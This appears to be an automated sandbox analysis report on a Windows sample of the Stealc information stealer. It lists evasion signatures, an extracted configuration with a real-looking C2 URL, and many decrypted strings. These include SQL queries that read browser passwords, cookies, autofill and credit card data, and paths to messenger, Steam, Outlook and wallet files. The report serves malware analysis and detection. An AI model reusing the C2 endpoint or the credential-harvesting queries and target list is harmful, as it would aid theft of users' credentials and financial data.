Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546392
MD5:508dc49e57681ea817bd36f9770ad609
SHA1:d3cb94f703fa7549d47d9984393c34413bacb53f
SHA256:bd37eb6db999d3f29ae806b66fb66d0f8e378b6b9169ecb9b7b7ed7308c0c7bf
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 508DC49E57681EA817BD36F9770AD609)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1685626986.0000000004F20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6976JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6976JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.180000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T20:48:00.319326+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.180000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.180000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.180000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.180000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.180000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.180000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.180000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.180000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.180000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.180000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.180000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.180000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.180000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.180000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.180000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.180000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.180000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.180000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.180000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.180000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.180000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.180000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.180000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.180000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.180000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.180000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.180000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.180000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.180000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.180000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.180000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.180000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.180000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.180000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.180000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.180000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.180000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.180000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.180000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.180000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.180000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.180000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.180000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.180000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.180000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.180000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.180000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.180000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.180000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.180000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.180000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.180000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.180000.0.unpackString decryptor: history
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.180000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.180000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.180000.0.unpackString decryptor: History
                Source: 0.2.file.exe.180000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.180000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.180000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.180000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.180000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.180000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.180000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.180000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.180000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.180000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.180000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.180000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.180000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.180000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.180000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.180000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.180000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.180000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.180000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.180000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.180000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.180000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.180000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.180000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.180000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.180000.0.unpackString decryptor: open
                Source: 0.2.file.exe.180000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.180000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.180000.0.unpackString decryptor: files
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.180000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.180000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.180000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.180000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.180000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.180000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.180000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.180000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.180000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.180000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.180000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.180000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.180000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.180000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.180000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.180000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.180000.0.unpackString decryptor: done
